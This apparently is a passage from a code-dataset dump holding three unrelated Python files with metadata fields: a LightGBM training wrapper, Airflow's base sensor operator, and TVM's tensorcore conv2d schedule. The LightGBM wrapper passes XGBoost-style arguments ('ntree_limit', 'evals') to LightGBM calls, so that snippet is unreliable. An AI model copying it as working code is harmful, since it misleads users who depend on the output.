model_path = os.path.join(f'../model/model/{feature}', f'{self.run_fold_name}.model')
self.model = Util.load(model_path)
| 36.418182
| 93
| 0.64653
|
import os,sys
sys.path.append('../')
import os
import numpy as np
import pandas as pd
import lightgbm as lgb
from src.model import Model
from src.util import Util
from sklearn.metrics import log_loss, accuracy_score, f1_score, classification_report
class ModelLGB(Model):
def __init__(self, run_fold_name, **params):
super().__init__(run_fold_name, params)
def train(self, tr_x, tr_y, va_x=None, va_y=None):
validation = va_x is not None
dtrain = lgb.Dataset(tr_x, label=tr_y)
if validation:
dvalid = lgb.Dataset(va_x, label=va_y)
params = dict(self.params)
num_round = params.pop('num_boost_round')
if validation:
early_stopping_rounds = params.pop('early_stopping_rounds')
watchlist = [dtrain, dvalid ]
self.model = lgb.train(params, dtrain, num_round, valid_sets=watchlist,
valid_names=['train','eval'],
early_stopping_rounds=early_stopping_rounds)
else:
watchlist = [(dtrain, 'train')]
self.model = lgb.train(params, dtrain, num_round, evals=watchlist)
def predict(self, te_x):
return self.model.predict(te_x, ntree_limit=self.model.best_iteration)
def score(self, te_x, te_y):
pred_prob = self.predict(te_x)
y_pred = np.argmax(pred_prob, axis=1)
return f1_score(np.identity(5)[te_y], np.identity(5)[y_pred], average='samples')
def save_model(self, feature):
model_path = os.path.join(f'../model/model/{feature}', f'{self.run_fold_name}.model')
os.makedirs(os.path.dirname(model_path), exist_ok=True)
Util.dump(self.model, model_path)
def load_model(self, feature):
model_path = os.path.join(f'../model/model/{feature}', f'{self.run_fold_name}.model')
self.model = Util.load(model_path)
| true
| true
|
790db0a494b66f67346f0144d8df455628407ad8
| 9,231
|
py
|
Python
|
airflow/sensors/base_sensor_operator.py
|
joshowen/airflow
|
d0cf232919839d0e338dcc38a5c7a1841077eaae
|
[
"Apache-2.0"
] | 3
|
2015-08-25T13:56:44.000Z
|
2020-03-21T10:26:58.000Z
|
airflow/sensors/base_sensor_operator.py
|
joshowen/airflow
|
d0cf232919839d0e338dcc38a5c7a1841077eaae
|
[
"Apache-2.0"
] | 37
|
2020-07-21T07:50:02.000Z
|
2022-03-29T22:31:28.000Z
|
airflow/sensors/base_sensor_operator.py
|
santecapital/airflow
|
7f02e56c9cb8b548624d13e9c2c2b89d753f996b
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4
|
2020-07-17T14:02:28.000Z
|
2022-02-23T04:29:58.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import hashlib
import os
from datetime import timedelta
from time import sleep
from typing import Any, Dict, Iterable
from airflow.exceptions import (
AirflowException, AirflowRescheduleException, AirflowSensorTimeout, AirflowSkipException,
)
from airflow.models import BaseOperator, SkipMixin, TaskReschedule
from airflow.ti_deps.deps.ready_to_reschedule import ReadyToRescheduleDep
from airflow.utils import timezone
from airflow.utils.decorators import apply_defaults
class BaseSensorOperator(BaseOperator, SkipMixin):
"""
Sensor operators are derived from this class and inherit these attributes.
Sensor operators keep executing at a time interval and succeed when
a criteria is met and fail if and when they time out.
:param soft_fail: Set to true to mark the task as SKIPPED on failure
:type soft_fail: bool
:param poke_interval: Time in seconds that the job should wait in
between each tries
:type poke_interval: float
:param timeout: Time, in seconds before the task times out and fails.
:type timeout: float
:param mode: How the sensor operates.
Options are: ``{ poke | reschedule }``, default is ``poke``.
When set to ``poke`` the sensor is taking up a worker slot for its
whole execution time and sleeps between pokes. Use this mode if the
expected runtime of the sensor is short or if a short poke interval
is required. Note that the sensor will hold onto a worker slot and
a pool slot for the duration of the sensor's runtime in this mode.
When set to ``reschedule`` the sensor task frees the worker slot when
the criteria is not yet met and it's rescheduled at a later time. Use
this mode if the time before the criteria is met is expected to be
quite long. The poke interval should be more than one minute to
prevent too much load on the scheduler.
:type mode: str
:param exponential_backoff: allow progressive longer waits between
pokes by using exponential backoff algorithm
:type exponential_backoff: bool
"""
ui_color = '#e6f1f2' # type: str
valid_modes = ['poke', 'reschedule'] # type: Iterable[str]
@apply_defaults
def __init__(self,
poke_interval: float = 60,
timeout: float = 60 * 60 * 24 * 7,
soft_fail: bool = False,
mode: str = 'poke',
exponential_backoff: bool = False,
*args,
**kwargs) -> None:
super().__init__(*args, **kwargs)
self.poke_interval = poke_interval
self.soft_fail = soft_fail
self.timeout = timeout
self.mode = mode
self.exponential_backoff = exponential_backoff
self._validate_input_values()
def _validate_input_values(self) -> None:
if not isinstance(self.poke_interval, (int, float)) or self.poke_interval < 0:
raise AirflowException(
"The poke_interval must be a non-negative number")
if not isinstance(self.timeout, (int, float)) or self.timeout < 0:
raise AirflowException(
"The timeout must be a non-negative number")
if self.mode not in self.valid_modes:
raise AirflowException(
"The mode must be one of {valid_modes},"
"'{d}.{t}'; received '{m}'."
.format(valid_modes=self.valid_modes,
d=self.dag.dag_id if self.dag else "",
t=self.task_id, m=self.mode))
def poke(self, context: Dict) -> bool:
"""
Function that the sensors defined while deriving this class should
override.
"""
raise AirflowException('Override me.')
def execute(self, context: Dict) -> Any:
started_at = timezone.utcnow()
try_number = 1
log_dag_id = self.dag.dag_id if self.has_dag() else ""
if self.reschedule:
# If reschedule, use first start date of current try
task_reschedules = TaskReschedule.find_for_task_instance(context['ti'])
if task_reschedules:
started_at = task_reschedules[0].start_date
try_number = len(task_reschedules) + 1
while not self.poke(context):
if (timezone.utcnow() - started_at).total_seconds() > self.timeout:
# If sensor is in soft fail mode but will be retried then
# give it a chance and fail with timeout.
# This gives the ability to set up non-blocking AND soft-fail sensors.
if self.soft_fail and not context['ti'].is_eligible_to_retry():
self._do_skip_downstream_tasks(context)
raise AirflowSkipException(
f"Snap. Time is OUT. DAG id: {log_dag_id}")
else:
raise AirflowSensorTimeout(
f"Snap. Time is OUT. DAG id: {log_dag_id}")
if self.reschedule:
reschedule_date = timezone.utcnow() + timedelta(
seconds=self._get_next_poke_interval(started_at, try_number))
raise AirflowRescheduleException(reschedule_date)
else:
sleep(self._get_next_poke_interval(started_at, try_number))
try_number += 1
self.log.info("Success criteria met. Exiting.")
def _do_skip_downstream_tasks(self, context: Dict) -> None:
downstream_tasks = context['task'].get_flat_relatives(upstream=False)
self.log.debug("Downstream task_ids %s", downstream_tasks)
if downstream_tasks:
self.skip(context['dag_run'], context['ti'].execution_date, downstream_tasks)
def _get_next_poke_interval(self, started_at, try_number):
"""
Using the similar logic which is used for exponential backoff retry delay for operators.
"""
if self.exponential_backoff:
min_backoff = int(self.poke_interval * (2 ** (try_number - 2)))
current_time = timezone.utcnow()
run_hash = int(hashlib.sha1("{}#{}#{}#{}".format(
self.dag_id, self.task_id, started_at, try_number
).encode("utf-8")).hexdigest(), 16)
modded_hash = min_backoff + run_hash % min_backoff
delay_backoff_in_seconds = min(
modded_hash,
timedelta.max.total_seconds() - 1
)
new_interval = min(self.timeout - int((current_time - started_at).total_seconds()),
delay_backoff_in_seconds)
self.log.info("new %s interval is %s", self.mode, new_interval)
return new_interval
else:
return self.poke_interval
@property
def reschedule(self):
"""Define mode rescheduled sensors."""
return self.mode == 'reschedule'
# pylint: disable=no-member
@property
def deps(self):
"""
Adds one additional dependency for all sensor operators that
checks if a sensor task instance can be rescheduled.
"""
if self.reschedule:
return BaseOperator.deps.fget(self) | {ReadyToRescheduleDep()}
return BaseOperator.deps.fget(self)
def poke_mode_only(cls):
"""
Class Decorator for child classes of BaseSensorOperator to indicate
that instances of this class are only safe to use poke mode.
Will decorate all methods in the class to assert they did not change
the mode from 'poke'.
:param cls: BaseSensor class to enforce methods only use 'poke' mode.
:type cls: type
"""
def decorate(cls_type):
def mode_getter(_):
return 'poke'
def mode_setter(_, value):
if value != 'poke':
raise ValueError(
f"cannot set mode to 'poke'.")
if not issubclass(cls_type, BaseSensorOperator):
raise ValueError(f"poke_mode_only decorator should only be "
f"applied to subclasses of BaseSensorOperator,"
f" got:{cls_type}.")
cls_type.mode = property(mode_getter, mode_setter)
return cls_type
return decorate(cls)
if 'BUILDING_AIRFLOW_DOCS' in os.environ:
# flake8: noqa: F811
# Monkey patch hook to get good function headers while building docs
apply_defaults = lambda x: x
| 41.769231
| 96
| 0.638609
|
import hashlib
import os
from datetime import timedelta
from time import sleep
from typing import Any, Dict, Iterable
from airflow.exceptions import (
AirflowException, AirflowRescheduleException, AirflowSensorTimeout, AirflowSkipException,
)
from airflow.models import BaseOperator, SkipMixin, TaskReschedule
from airflow.ti_deps.deps.ready_to_reschedule import ReadyToRescheduleDep
from airflow.utils import timezone
from airflow.utils.decorators import apply_defaults
class BaseSensorOperator(BaseOperator, SkipMixin):
ui_color = '#e6f1f2'
valid_modes = ['poke', 'reschedule']
@apply_defaults
def __init__(self,
poke_interval: float = 60,
timeout: float = 60 * 60 * 24 * 7,
soft_fail: bool = False,
mode: str = 'poke',
exponential_backoff: bool = False,
*args,
**kwargs) -> None:
super().__init__(*args, **kwargs)
self.poke_interval = poke_interval
self.soft_fail = soft_fail
self.timeout = timeout
self.mode = mode
self.exponential_backoff = exponential_backoff
self._validate_input_values()
def _validate_input_values(self) -> None:
if not isinstance(self.poke_interval, (int, float)) or self.poke_interval < 0:
raise AirflowException(
"The poke_interval must be a non-negative number")
if not isinstance(self.timeout, (int, float)) or self.timeout < 0:
raise AirflowException(
"The timeout must be a non-negative number")
if self.mode not in self.valid_modes:
raise AirflowException(
"The mode must be one of {valid_modes},"
"'{d}.{t}'; received '{m}'."
.format(valid_modes=self.valid_modes,
d=self.dag.dag_id if self.dag else "",
t=self.task_id, m=self.mode))
def poke(self, context: Dict) -> bool:
raise AirflowException('Override me.')
def execute(self, context: Dict) -> Any:
started_at = timezone.utcnow()
try_number = 1
log_dag_id = self.dag.dag_id if self.has_dag() else ""
if self.reschedule:
task_reschedules = TaskReschedule.find_for_task_instance(context['ti'])
if task_reschedules:
started_at = task_reschedules[0].start_date
try_number = len(task_reschedules) + 1
while not self.poke(context):
if (timezone.utcnow() - started_at).total_seconds() > self.timeout:
if self.soft_fail and not context['ti'].is_eligible_to_retry():
self._do_skip_downstream_tasks(context)
raise AirflowSkipException(
f"Snap. Time is OUT. DAG id: {log_dag_id}")
else:
raise AirflowSensorTimeout(
f"Snap. Time is OUT. DAG id: {log_dag_id}")
if self.reschedule:
reschedule_date = timezone.utcnow() + timedelta(
seconds=self._get_next_poke_interval(started_at, try_number))
raise AirflowRescheduleException(reschedule_date)
else:
sleep(self._get_next_poke_interval(started_at, try_number))
try_number += 1
self.log.info("Success criteria met. Exiting.")
def _do_skip_downstream_tasks(self, context: Dict) -> None:
downstream_tasks = context['task'].get_flat_relatives(upstream=False)
self.log.debug("Downstream task_ids %s", downstream_tasks)
if downstream_tasks:
self.skip(context['dag_run'], context['ti'].execution_date, downstream_tasks)
def _get_next_poke_interval(self, started_at, try_number):
if self.exponential_backoff:
min_backoff = int(self.poke_interval * (2 ** (try_number - 2)))
current_time = timezone.utcnow()
run_hash = int(hashlib.sha1("{}#{}#{}#{}".format(
self.dag_id, self.task_id, started_at, try_number
).encode("utf-8")).hexdigest(), 16)
modded_hash = min_backoff + run_hash % min_backoff
delay_backoff_in_seconds = min(
modded_hash,
timedelta.max.total_seconds() - 1
)
new_interval = min(self.timeout - int((current_time - started_at).total_seconds()),
delay_backoff_in_seconds)
self.log.info("new %s interval is %s", self.mode, new_interval)
return new_interval
else:
return self.poke_interval
@property
def reschedule(self):
return self.mode == 'reschedule'
@property
def deps(self):
if self.reschedule:
return BaseOperator.deps.fget(self) | {ReadyToRescheduleDep()}
return BaseOperator.deps.fget(self)
def poke_mode_only(cls):
def decorate(cls_type):
def mode_getter(_):
return 'poke'
def mode_setter(_, value):
if value != 'poke':
raise ValueError(
f"cannot set mode to 'poke'.")
if not issubclass(cls_type, BaseSensorOperator):
raise ValueError(f"poke_mode_only decorator should only be "
f"applied to subclasses of BaseSensorOperator,"
f" got:{cls_type}.")
cls_type.mode = property(mode_getter, mode_setter)
return cls_type
return decorate(cls)
if 'BUILDING_AIRFLOW_DOCS' in os.environ:
apply_defaults = lambda x: x
| true
| true
|
790db0fe89a04beb0224baffd456de9a966428fd
| 12,782
|
py
|
Python
|
topi/python/topi/cuda/conv2d_nhwc_tensorcore.py
|
retamia/tvm
|
5d25dc54d874bf2ddf0e8cf34c4748e9e2656fd8
|
[
"Apache-2.0"
] | 9
|
2019-12-17T08:03:54.000Z
|
2022-01-19T02:34:23.000Z
|
topi/python/topi/cuda/conv2d_nhwc_tensorcore.py
|
retamia/tvm
|
5d25dc54d874bf2ddf0e8cf34c4748e9e2656fd8
|
[
"Apache-2.0"
] | 2
|
2020-07-08T12:34:59.000Z
|
2020-07-11T15:54:47.000Z
|
topi/python/topi/cuda/conv2d_nhwc_tensorcore.py
|
retamia/tvm
|
5d25dc54d874bf2ddf0e8cf34c4748e9e2656fd8
|
[
"Apache-2.0"
] | 3
|
2020-10-04T20:30:18.000Z
|
2022-01-24T18:03:52.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, too-many-locals, too-many-function-args
# pylint: disable=too-many-statements, unused-argument, too-many-arguments
"""Tensorcore template for cuda backend"""
import numpy as np
import tvm
from tvm import te
from tvm import autotvm
from ..util import get_const_tuple, traverse_inline, simplify
from ..nn.pad import pad
from ..nn.util import get_pad_tuple
from .tensor_intrin import intrin_wmma_load_matrix_A
from .tensor_intrin import intrin_wmma_load_matrix_W
from .tensor_intrin import intrin_wmma_store_matrix
from .tensor_intrin import intrin_wmma_gemm
def nhwc_tensorcore_cuda(cfg, Input, Filter, stride, padding, dilation, out_dtype):
"""Compute declaration for tensorcore"""
assert isinstance(stride, int) or len(stride) == 2
assert isinstance(dilation, int) or len(dilation) == 2
if isinstance(stride, int):
stride_h = stride_w = stride
else:
stride_h, stride_w = stride
if isinstance(dilation, int):
dilation_h = dilation_w = dilation
else:
dilation_h, dilation_w = dilation
batch, in_height, in_width, in_channel = get_const_tuple(Input.shape)
kernel_h, kernel_w, _, num_filter = get_const_tuple(Filter.shape)
assert (batch % 16 == 0 and in_channel % 16 == 0 and num_filter % 16 == 0) or \
(batch % 8 == 0 and in_channel % 16 == 0 and num_filter % 32 == 0) or \
(batch % 32 == 0 and in_channel % 16 == 0 and num_filter % 8 == 0), \
"The shape of (batch, in_channel, num_filter) "\
"must be multiple of (16, 16, 16) or (32, 16, 8) or (8, 16, 32) for now"
# compute the output shape
dilated_kernel_h = (kernel_h - 1) * dilation_h + 1
dilated_kernel_w = (kernel_w - 1) * dilation_w + 1
pad_top, pad_left, pad_down, pad_right = get_pad_tuple(
padding, (dilated_kernel_h, dilated_kernel_w))
out_channel = num_filter
out_height = simplify((in_height - dilated_kernel_h + pad_top + pad_down) // stride_h + 1)
out_width = simplify((in_width - dilated_kernel_w + pad_left + pad_right) // stride_w + 1)
pad_before = [0, pad_top, pad_left, 0]
pad_after = [0, pad_down, pad_right, 0]
PaddedInput = pad(Input, pad_before, pad_after, name="PaddedInput")
rc = te.reduce_axis((0, in_channel), name='rc')
ry = te.reduce_axis((0, kernel_h), name='ry')
rx = te.reduce_axis((0, kernel_w), name='rx')
# convert data type of input feature maps and weights
TransPaddedInput = te.compute(
PaddedInput.shape,
lambda n, h, w, c: PaddedInput[n, h, w, c].astype('float16'))
TransFilter = te.compute(
Filter.shape, lambda h, w, i, o: Filter[h, w, i, o].astype('float16'))
Output = te.compute(
(batch, out_height, out_width, out_channel),
lambda nn, yy, xx, ff: te.sum(
TransPaddedInput[nn, yy * stride_h + ry * dilation_h,
xx * stride_w + rx * dilation_w, rc].astype(out_dtype) *
TransFilter[ry, rx, rc, ff].astype(out_dtype), axis=[ry, rx, rc]),
name="Conv2dOutput", tag="conv2d_nhwc_tensorcore")
return Output
def schedule_nhwc_tensorcore_cuda(cfg, s, Conv):
"""Schedule tensorcore template"""
kh, kw, ic = s[Conv].op.reduce_axis
out_dtype = Conv.dtype
trans_paddata, kernel = s[Conv].op.input_tensors
in_dtype = trans_paddata.dtype
batch, _, _, _ = get_const_tuple(Conv.shape)
_, _, _, out_channels = get_const_tuple(kernel.shape)
paddata = s[trans_paddata].op.input_tensors
# inline the pad and dtype transform
s[trans_paddata].compute_inline()
s[kernel].compute_inline()
s[paddata[0]].compute_inline()
# Designate the memory hierarchy
AS = s.cache_read(trans_paddata, 'shared', [Conv])
WS = s.cache_read(kernel, 'shared', [Conv])
AF = s.cache_read(AS, 'wmma.matrix_a', [Conv])
WF = s.cache_read(WS, 'wmma.matrix_b', [Conv])
ConvF = s.cache_write(Conv, 'wmma.accumulator')
if Conv.op in s.outputs:
output = Conv
ConvS = s.cache_read(ConvF, 'shared', [Conv])
OL = ConvS
else:
output = s.outputs[0].output(0)
s[Conv].set_scope('shared')
OL = Conv
# Schedule for autotvm
cfg.define_knob("block_row_warps", [1, 2, 4])
cfg.define_knob("block_col_warps", [1, 2, 4])
cfg.define_knob("warp_row_tiles", [1, 2, 4])
cfg.define_knob("warp_col_tiles", [1, 2, 4])
cfg.define_knob("chunk", [1, 2, 4, 8])
cfg.define_knob("offset", [0, 8])
cfg.define_knob("vector_width", [1, 2, 4, 8])
if (batch % 16 == 0 and out_channels % 16 == 0):
cfg.define_knob("wmma_m", [16, 8, 32])
elif (batch % 8 == 0 and out_channels % 32 == 0):
cfg.define_knob("wmma_m", [8, 16, 32])
elif (batch % 32 == 0 and out_channels % 8 == 0):
cfg.define_knob("wmma_m", [32, 16, 8])
# fallback support
target = tvm.target.Target.current()
if cfg.is_fallback:
ref_log = autotvm.tophub.load_reference_log(
target.target_name, target.model, 'conv2d_nhwc_tensorcore.cuda')
cfg.fallback_with_reference_log(ref_log)
block_row_warps = cfg["block_row_warps"].val
block_col_warps = cfg["block_col_warps"].val
warp_row_tiles = cfg["warp_row_tiles"].val
warp_col_tiles = cfg["warp_col_tiles"].val
chunk = cfg["chunk"].val
offset = cfg["offset"].val
wmma_m = cfg["wmma_m"].val
vector_width = cfg["vector_width"].val
wmma_k = 16
if wmma_m == 16:
wmma_n = 16
elif wmma_m == 8:
wmma_n = 32
elif wmma_m == 32:
wmma_n = 8
warp_size = 32
block_x = te.thread_axis('blockIdx.x')
block_y = te.thread_axis('blockIdx.y')
block_z = te.thread_axis('blockIdx.z')
thread_x = te.thread_axis('threadIdx.x')
thread_y = te.thread_axis('threadIdx.y')
thread_z = te.thread_axis('threadIdx.z')
# Define the intrin strides
def get_strides(extents):
return [np.prod(extents[i:]).tolist() for i in range(len(extents))]
AS_align = chunk * wmma_k + offset
WS_align = warp_col_tiles * block_col_warps * wmma_n + offset
block_factor_n = wmma_m * warp_row_tiles * block_row_warps
block_factor_o = wmma_n * warp_col_tiles * block_col_warps
CS_align = block_factor_o + offset
AS_strides = get_strides([1, 1, AS_align, 1])
AL_strides = get_strides([1, 1, wmma_k, 1])
WS_strides = get_strides([WS_align, 1])
WL_strides = get_strides([wmma_n * warp_col_tiles, 1])
CL_strides = get_strides([1, 1, wmma_n * warp_col_tiles, 1])
CS_strides = get_strides([1, 1, CS_align, 1])
# Schedule for output
nc, hc, wc, oc = output.op.axis
block_k = s[output].fuse(hc, wc)
s[output].bind(block_k, block_z)
block_i, nc = s[output].split(nc, factor=block_factor_n)
block_j, oc = s[output].split(oc, factor=block_factor_o)
s[output].reorder(block_k, block_i, block_j, nc, oc)
t = s[output].fuse(nc, oc)
t, ti = s[output].split(t, factor=vector_width)
t, tx = s[output].split(t, factor=warp_size)
t, ty = s[output].split(t, factor=block_row_warps)
t, tz = s[output].split(t, factor=block_col_warps)
s[output].bind(block_i, block_x)
s[output].bind(block_j, block_y)
s[output].bind(tz, thread_z)
s[output].bind(ty, thread_y)
s[output].bind(tx, thread_x)
s[output].vectorize(ti)
# Schedule wmma store
s[OL].compute_at(s[output], block_j)
nc, hc, wc, oc = OL.op.axis
s[OL].reorder(hc, wc, nc, oc)
s[OL].storage_align(wc, CS_align - 1, CS_align)
oc, ooc = s[OL].split(oc, factor=wmma_n)
oc, oci = s[OL].split(oc, factor=warp_col_tiles)
_, oc = s[OL].split(oc, factor=block_col_warps)
nc, nnc = s[OL].split(nc, factor=wmma_m)
nc, nci = s[OL].split(nc, factor=warp_row_tiles)
_, nc = s[OL].split(nc, factor=block_row_warps)
s[OL].reorder(nc, oc, nci, oci, nnc, ooc)
s[OL].bind(nc, thread_y)
s[OL].bind(oc, thread_z)
# Schedule wmma computation
s[ConvF].compute_at(s[OL], oc)
n, h, w, o = ConvF.op.axis
n, nnf = s[ConvF].split(n, factor=wmma_m)
o, oof = s[ConvF].split(o, factor=wmma_n)
ic, ii = s[ConvF].split(ic, factor=wmma_k)
ko, ki = s[ConvF].split(ic, factor=chunk)
s[ConvF].reorder(kh, kw, ko, ki, n, o, nnf, oof, ii)
s[AF].compute_at(s[ConvF], ki)
s[WF].compute_at(s[ConvF], ki)
# Schedule wmma load
n, h, w, i = AF.op.axis
n, nn = s[AF].split(n, factor=wmma_m)
i, ii = s[AF].split(i, factor=wmma_k)
s[AF].reorder(n, i, nn, ii)
kh, kw, i, o = WF.op.axis
i, ii = s[WF].split(i, factor=wmma_k)
o, oo = s[WF].split(o, factor=wmma_n)
s[WF].reorder(o, i, oo)
s[WF].reorder(i, o, ii, oo)
s[WS].compute_at(s[ConvF], ko)
s[AS].compute_at(s[ConvF], ko)
# Schedule for data's share memory
n, h, w, i = AS.op.axis
s[AS].reorder(h, w, n, i)
s[AS].storage_align(w, AS_align - 1, AS_align)
t = s[AS].fuse(n, i)
t, ti = s[AS].split(t, factor=vector_width)
t, tx = s[AS].split(t, factor=warp_size)
t, ty = s[AS].split(t, factor=block_row_warps)
_, tz = s[AS].split(t, factor=block_col_warps)
s[AS].bind(ty, thread_y)
s[AS].bind(tz, thread_z)
s[AS].bind(tx, thread_x)
s[AS].vectorize(ti)
# Schedule for kernel's share memory
kh, kw, ic, o = WS.op.axis
t = s[WS].fuse(ic, o)
s[WS].storage_align(ic, WS_align - 1, WS_align)
t, ti = s[WS].split(t, factor=vector_width)
t, tx = s[WS].split(t, factor=warp_size)
t, ty = s[WS].split(t, factor=block_row_warps)
_, tz = s[WS].split(t, factor=block_col_warps)
s[WS].bind(ty, thread_y)
s[WS].bind(tz, thread_z)
s[WS].bind(tx, thread_x)
s[WS].vectorize(ti)
shape = (wmma_m, wmma_n, wmma_k)
# tensorize the wmma process
AS_shape = (wmma_m, 1, 1, wmma_k)
AL_shape = (wmma_m, 1, 1, wmma_k)
WS_shape = (wmma_k, wmma_n)
WL_shape = (wmma_k, wmma_n)
CL_shape = (wmma_m, 1, 1, wmma_n)
CS_shape = (wmma_m, 1, 1, wmma_n)
AL_gemm = te.placeholder(AL_shape, name='A', dtype=in_dtype)
WL_gemm = te.placeholder(WL_shape, name='B', dtype=in_dtype)
k_gemm = te.reduce_axis((0, wmma_k), name="k")
CL_compute = te.compute(CL_shape, lambda ii, t0, t1, jj:
te.sum(AL_gemm[ii, t0, t1, k_gemm].astype(out_dtype) * \
WL_gemm[k_gemm, jj].astype(out_dtype), axis=k_gemm),
name='C')
s[AF].tensorize(nn, intrin_wmma_load_matrix_A(AL_strides, AS_strides, shape,
"row_major", AS_shape, AL_shape, in_dtype))
s[WF].tensorize(ii, intrin_wmma_load_matrix_W(WL_strides, WS_strides, shape,
"row_major", WS_shape, WL_shape, in_dtype))
s[OL].tensorize(nnc, intrin_wmma_store_matrix(CS_strides, CL_strides,
shape, out_dtype, CL_shape, CS_shape))
s[ConvF].tensorize(nnf, intrin_wmma_gemm(AL_gemm, WL_gemm, CL_compute, AL_strides,
WL_strides, CL_strides, shape))
N, OH, OW, CO = get_const_tuple(output.shape)
KH, KW, CI, _ = get_const_tuple(kernel.shape)
cfg.add_flop(2 * N * OH * OW * CO * CI * KH * KW)
@autotvm.register_topi_compute("conv2d_nhwc_tensorcore.cuda")
def conv2d_nhwc_tensorcore(cfg, data, kernel, strides, padding, dilation, out_dtype):
"""Compute conv2d with tensorcore for NCHW layout"""
return nhwc_tensorcore_cuda(cfg, data, kernel, strides, padding, dilation, out_dtype)
@autotvm.register_topi_schedule("conv2d_nhwc_tensorcore.cuda")
def schedule_conv2d_nhwc_tensorcore(cfg, outs):
"""TOPI schedule callback"""
s = te.create_schedule([x.op for x in outs])
def _callback(op):
if 'conv2d_nhwc_tensorcore' in op.tag:
schedule_nhwc_tensorcore_cuda(cfg, s, op.output(0))
traverse_inline(s, outs[0].op, _callback)
return s
| 40.068966
| 94
| 0.643561
|
import numpy as np
import tvm
from tvm import te
from tvm import autotvm
from ..util import get_const_tuple, traverse_inline, simplify
from ..nn.pad import pad
from ..nn.util import get_pad_tuple
from .tensor_intrin import intrin_wmma_load_matrix_A
from .tensor_intrin import intrin_wmma_load_matrix_W
from .tensor_intrin import intrin_wmma_store_matrix
from .tensor_intrin import intrin_wmma_gemm
def nhwc_tensorcore_cuda(cfg, Input, Filter, stride, padding, dilation, out_dtype):
assert isinstance(stride, int) or len(stride) == 2
assert isinstance(dilation, int) or len(dilation) == 2
if isinstance(stride, int):
stride_h = stride_w = stride
else:
stride_h, stride_w = stride
if isinstance(dilation, int):
dilation_h = dilation_w = dilation
else:
dilation_h, dilation_w = dilation
batch, in_height, in_width, in_channel = get_const_tuple(Input.shape)
kernel_h, kernel_w, _, num_filter = get_const_tuple(Filter.shape)
assert (batch % 16 == 0 and in_channel % 16 == 0 and num_filter % 16 == 0) or \
(batch % 8 == 0 and in_channel % 16 == 0 and num_filter % 32 == 0) or \
(batch % 32 == 0 and in_channel % 16 == 0 and num_filter % 8 == 0), \
"The shape of (batch, in_channel, num_filter) "\
"must be multiple of (16, 16, 16) or (32, 16, 8) or (8, 16, 32) for now"
dilated_kernel_h = (kernel_h - 1) * dilation_h + 1
dilated_kernel_w = (kernel_w - 1) * dilation_w + 1
pad_top, pad_left, pad_down, pad_right = get_pad_tuple(
padding, (dilated_kernel_h, dilated_kernel_w))
out_channel = num_filter
out_height = simplify((in_height - dilated_kernel_h + pad_top + pad_down) // stride_h + 1)
out_width = simplify((in_width - dilated_kernel_w + pad_left + pad_right) // stride_w + 1)
pad_before = [0, pad_top, pad_left, 0]
pad_after = [0, pad_down, pad_right, 0]
PaddedInput = pad(Input, pad_before, pad_after, name="PaddedInput")
rc = te.reduce_axis((0, in_channel), name='rc')
ry = te.reduce_axis((0, kernel_h), name='ry')
rx = te.reduce_axis((0, kernel_w), name='rx')
TransPaddedInput = te.compute(
PaddedInput.shape,
lambda n, h, w, c: PaddedInput[n, h, w, c].astype('float16'))
TransFilter = te.compute(
Filter.shape, lambda h, w, i, o: Filter[h, w, i, o].astype('float16'))
Output = te.compute(
(batch, out_height, out_width, out_channel),
lambda nn, yy, xx, ff: te.sum(
TransPaddedInput[nn, yy * stride_h + ry * dilation_h,
xx * stride_w + rx * dilation_w, rc].astype(out_dtype) *
TransFilter[ry, rx, rc, ff].astype(out_dtype), axis=[ry, rx, rc]),
name="Conv2dOutput", tag="conv2d_nhwc_tensorcore")
return Output
def schedule_nhwc_tensorcore_cuda(cfg, s, Conv):
kh, kw, ic = s[Conv].op.reduce_axis
out_dtype = Conv.dtype
trans_paddata, kernel = s[Conv].op.input_tensors
in_dtype = trans_paddata.dtype
batch, _, _, _ = get_const_tuple(Conv.shape)
_, _, _, out_channels = get_const_tuple(kernel.shape)
paddata = s[trans_paddata].op.input_tensors
s[trans_paddata].compute_inline()
s[kernel].compute_inline()
s[paddata[0]].compute_inline()
AS = s.cache_read(trans_paddata, 'shared', [Conv])
WS = s.cache_read(kernel, 'shared', [Conv])
AF = s.cache_read(AS, 'wmma.matrix_a', [Conv])
WF = s.cache_read(WS, 'wmma.matrix_b', [Conv])
ConvF = s.cache_write(Conv, 'wmma.accumulator')
if Conv.op in s.outputs:
output = Conv
ConvS = s.cache_read(ConvF, 'shared', [Conv])
OL = ConvS
else:
output = s.outputs[0].output(0)
s[Conv].set_scope('shared')
OL = Conv
cfg.define_knob("block_row_warps", [1, 2, 4])
cfg.define_knob("block_col_warps", [1, 2, 4])
cfg.define_knob("warp_row_tiles", [1, 2, 4])
cfg.define_knob("warp_col_tiles", [1, 2, 4])
cfg.define_knob("chunk", [1, 2, 4, 8])
cfg.define_knob("offset", [0, 8])
cfg.define_knob("vector_width", [1, 2, 4, 8])
if (batch % 16 == 0 and out_channels % 16 == 0):
cfg.define_knob("wmma_m", [16, 8, 32])
elif (batch % 8 == 0 and out_channels % 32 == 0):
cfg.define_knob("wmma_m", [8, 16, 32])
elif (batch % 32 == 0 and out_channels % 8 == 0):
cfg.define_knob("wmma_m", [32, 16, 8])
target = tvm.target.Target.current()
if cfg.is_fallback:
ref_log = autotvm.tophub.load_reference_log(
target.target_name, target.model, 'conv2d_nhwc_tensorcore.cuda')
cfg.fallback_with_reference_log(ref_log)
block_row_warps = cfg["block_row_warps"].val
